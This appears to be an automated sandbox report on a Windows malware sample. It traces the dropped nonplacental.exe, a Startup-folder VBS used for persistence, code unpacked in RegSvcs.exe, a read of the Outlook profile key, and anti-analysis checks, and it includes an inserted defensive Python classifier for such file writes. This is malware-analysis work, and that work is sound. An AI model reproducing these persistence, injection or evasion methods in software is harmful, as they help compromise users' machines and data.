Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: ref_97024130865.exe | Static file information: File size 1112064 > 1048576
Source: ref_97024130865.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ref_97024130865.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ref_97024130865.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ref_97024130865.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ref_97024130865.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ref_97024130865.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: ref_97024130865.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: _.pdb | source: RegSvcs.exe, 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: nonplacental.exe, 00000002.00000003.2077461971.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2078549075.0000000004190000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2195475586.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2195865927.0000000004270000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: nonplacental.exe, 00000002.00000003.2077461971.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2078549075.0000000004190000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2195475586.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2195865927.0000000004270000.00000004.00001000.00020000.00000000.sdmp
Source: ref_97024130865.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ref_97024130865.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ref_97024130865.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ref_97024130865.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ref_97024130865.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FD4B37 LoadLibraryA,GetProcAddress, 0_2_00FD4B37
Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FF8945 push ecx; ret 0_2_00FF8958
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_005FC4C6 push A3005FBAh; retn 005Fh 2_2_005FC50D
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00618945 push ecx; ret 2_2_00618958
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041C40C push cs; iretd 3_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041C50E push cs; iretd 3_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040E21D push ecx; ret 3_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041C6BE push ebx; ret 3_2_0041C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041BFCD pushad ; ret 3_2_0041BFCE
Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'l1JqknvYEVpdi', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'l1JqknvYEVpdi', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'l1JqknvYEVpdi', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'l1JqknvYEVpdi', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'l1JqknvYEVpdi', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: C:\Users\user\Desktop\ref_97024130865.exe | File created: C:\Users\user\AppData\Local\juvenile\nonplacental.exe (dropped file)

Boot Survival

Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs
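The two file writes above, a fresh executable under %LOCALAPPDATA%\juvenile and a .vbs placed in the per-user Startup folder, are the observations behind the "Drops script at startup location" and "Drops VBS files to the startup folder" signatures. As an added example that is not part of the Joe Sandbox report, the Python below classifies report-style "File created" rows for exactly that pattern: scripts or executables landing in the Startup folder are flagged as persistence, a new PE under AppData\Local as staging. The sample rows are constructed from the paths listed above plus one benign row; the extension lists and the benign row are assumptions of the example.

```python
"""Classify sandbox-style "File created" events for persistence and staging.

Added example; not part of the Joe Sandbox report. The sample rows at the
bottom are constructed from the paths the report lists (plus one benign row),
not copied from the sandbox log.
"""
from __future__ import annotations

import re
from pathlib import PureWindowsPath

# Profile-relative folders. Anything placed in the per-user Startup folder runs
# at the next interactive logon without a registry key or scheduled task.
STARTUP_DIR = PureWindowsPath("AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup")
LOCALAPPDATA_DIR = PureWindowsPath("AppData/Local")

# Extension lists are an assumption of this example, not taken from the report.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".bat", ".cmd", ".ps1", ".lnk"}
EXEC_EXTS = {".exe", ".dll", ".scr", ".com"}

# Report rows arrive as "Source: <process>File created: <path>[Jump to ...]"; the
# cell separator is often lost in extraction, so the regex tolerates its absence.
EVENT_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*File created:\s*"
    r"(?P<path>[A-Za-z]:\\[^\r\n]+?)\s*(?:Jump to (?:behavior|dropped file))?$"
)


def parse_event(line: str) -> tuple[str, str] | None:
    """Return (creating process, created path) or None if the row is not a file creation."""
    m = EVENT_RE.search(line)
    return (m.group("proc"), m.group("path")) if m else None


def _under_profile_dir(path: PureWindowsPath, sub: PureWindowsPath) -> bool:
    """True if path is C:\\Users\\<anyone>\\<sub>\\... (case-insensitive)."""
    parts = [p.lower() for p in path.parts]
    want = [p.lower() for p in sub.parts]
    return (
        len(parts) > 3 + len(want)
        and parts[1] == "users"
        and parts[3 : 3 + len(want)] == want
    )


def classify(proc: str, path_str: str) -> str | None:
    """Map one event to a verdict string, or None when nothing is suspicious."""
    path = PureWindowsPath(path_str)
    ext = path.suffix.lower()
    if _under_profile_dir(path, STARTUP_DIR):
        if ext in SCRIPT_EXTS:
            return "persistence:startup-script"
        if ext in EXEC_EXTS:
            return "persistence:startup-executable"
    if _under_profile_dir(path, LOCALAPPDATA_DIR) and ext in EXEC_EXTS:
        # A freshly written PE in a new %LOCALAPPDATA% subfolder is the staging
        # step that usually precedes the Startup write.
        return "staging:executable-in-localappdata"
    return None


def triage(lines: list[str]) -> list[tuple[str, str, str]]:
    """Parse, de-duplicate and classify; returns (process, path, verdict) in first-seen order."""
    seen: set[tuple[str, str]] = set()
    findings = []
    for line in lines:
        event = parse_event(line)
        if event is None or event in seen:
            continue
        seen.add(event)
        verdict = classify(*event)
        if verdict:
            findings.append((event[0], event[1], verdict))
    return findings


# Constructed sample rows modelled on the report's entries; the last one is benign.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\ref_97024130865.exeFile created: C:\Users\user\AppData\Local\juvenile\nonplacental.exeJump to dropped file",
    r"Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbsJump to dropped file",
    r"Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbsJump to behavior",
    r"Source: C:\Windows\explorer.exeFile created: C:\Users\user\Documents\notes.txtJump to behavior",
]

if __name__ == "__main__":
    for proc, path, verdict in triage(SAMPLE_LINES):
        print(f"{verdict:40} {proc} -> {path}")
```

Running it over the constructed rows yields two findings, the staged nonplacental.exe and the Startup .vbs, with the repeated .vbs row collapsed. The same classifier can be pointed at Sysmon Event ID 11 (FileCreate) records by feeding it the TargetFilename and Image fields in place of the report rows.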
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_00FD48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00FD48D7
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_01055376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_01055376
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 2_2_005F48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_005F48D7
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 2_2_00675376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00675376
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_00FF3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FF3187
Source: C:\Users\user\Desktop\ref_97024130865.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Process information set: NOOPENFILEERRORBOX (4 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX (118 occurrences)
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 occurrences)

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 6660, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3128, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe API/Special instruction interceptor: Address: 1793F04
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe API/Special instruction interceptor: Address: 1947F5C
Source: ref_97024130865.exe, 00000000.00000003.2053367845.0000000001572000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000003.2054377903.0000000001596000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000003.2053413308.0000000001596000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000003.2054033542.0000000001596000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000003.2055038344.0000000001596000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000003.2054703652.0000000001596000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000002.2063619740.0000000001596000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000003.2054204008.0000000001596000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000003.2054526373.0000000001596000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000003.2054746605.0000000001596000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXEJG6
Source: ref_97024130865.exe, 00000000.00000002.2063732529.0000000001620000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000002.2081249049.0000000001838000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: nonplacental.exe, 00000005.00000002.2197381352.00000000018D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXEXE
Source: nonplacental.exe, 00000005.00000002.2197802542.00000000019AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXELQ2
Source: nonplacental.exe, 00000002.00000003.2063594339.00000000017A5000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2065322693.00000000017A5000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2066484581.00000000017A5000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2062779197.00000000017A5000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2064611358.00000000017A5000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2080603298.00000000017A5000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2064118227.00000000017A5000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2062714879.0000000001781000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000002.2081180409.00000000017A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXENC
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\Desktop\ref_97024130865.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-105579
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\ref_97024130865.exe API coverage: 4.6 %
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe API coverage: 4.8 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 5.3 %
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_0103445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0103445A
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_0103C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0103C75C
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_0103C6D1 FindFirstFileW,FindClose,0_2_0103C6D1
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_0103EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0103EF95
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_0103F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0103F0F2
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_0103F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0103F3F3
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_010337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_010337EF
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_01033B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_01033B12
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_0103BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0103BCBC
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 2_2_0065445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_0065445A
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 2_2_0065C6D1 FindFirstFileW,FindClose,2_2_0065C6D1
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 2_2_0065C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0065C75C
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 2_2_0065EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0065EF95
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 2_2_0065F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0065F0F2
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 2_2_0065F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0065F3F3
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 2_2_006537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_006537EF
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 2_2_00653B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00653B12
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 2_2_0065BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0065BCBC
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_00FD49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FD49A0
Source: RegSvcs.exe, 00000003.00000002.3295602592.0000000001005000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3295099646.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\ref_97024130865.exe API call chain: ExitProcess graph end node graph_0-104216
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_01043F09 BlockInput,0_2_01043F09
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_00FD3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00FD3B3A
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_01005A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_01005A7C
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_00FD4B37 LoadLibraryA,GetProcAddress,0_2_00FD4B37
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_01583028 mov eax, dword ptr fs:[00000030h] 0_2_01583028
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_01584668 mov eax, dword ptr fs:[00000030h] 0_2_01584668
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_015846C8 mov eax, dword ptr fs:[00000030h] 0_2_015846C8
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 2_2_01794170 mov eax, dword ptr fs:[00000030h] 2_2_01794170
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 2_2_017941D0 mov eax, dword ptr fs:[00000030h] 2_2_017941D0
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 2_2_01792B30 mov eax, dword ptr fs:[00000030h] 2_2_01792B30
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 5_2_01946B88 mov eax, dword ptr fs:[00000030h] 5_2_01946B88
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 5_2_01948228 mov eax, dword ptr fs:[00000030h] 5_2_01948228
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 5_2_019481C8 mov eax, dword ptr fs:[00000030h] 5_2_019481C8
